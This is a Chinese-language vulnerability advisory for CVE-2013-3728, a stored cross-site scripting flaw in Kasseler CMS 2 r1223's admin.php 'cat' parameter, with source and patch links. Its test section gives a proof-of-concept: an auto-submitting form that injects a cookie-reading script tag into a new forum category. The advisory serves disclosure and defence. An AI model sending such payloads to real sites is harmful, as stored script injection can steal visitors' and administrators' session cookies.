发布日期：2013-07-03
更新日期：2013-07-04

受影响系统：

Kasseler CMS Kasseler CMS <= 2 r1223

描述：

---

BUGTRAQ  ID: 60927
CVE(CAN) ID: CVE-2013-3728

Kasseler CMS是内容管理系统。

Kasseler CMS 2 r1223存在存储型跨站脚本漏洞，此漏洞源于"/admin.php"脚本内的"cat" HTTP POST参数缺少足够的过滤。远程攻击者如果可以创建目录，则可以注入任意HTML和脚本代码到应用数据库内，并在每个站点浏览者浏览器中执行。

<*来源：High-Tech Bridge Security Research Lab
  
  链接：https://www.htbridge.com/advisory/HTB23158
        http://seclists.org/bugtraq/2013/Jul/26
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

&amp;lt;form action=&quot;http://www.example.com/admin.php?module=forum&amp;amp;do=admin_new_category &quot; method=&quot;post&quot; name=&quot;main&quot;&amp;gt;
&amp;lt;input type=&quot;hidden&quot; name=&quot;cat&quot; value=&quot;&amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;&quot;&amp;gt;
&amp;lt;input type=&quot;submit&quot; id=&quot;btn&quot;&amp;gt;
&amp;lt;/form&amp;gt;
&amp;lt;script&amp;gt;
document.main.submit();
&amp;lt;/script&amp;gt;

建议：

---

厂商补丁：

Kasseler CMS
------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://diff.kasseler-cms.net/svn/patches/1232.html

浏览次数：4765
严重程度：0（网友投票）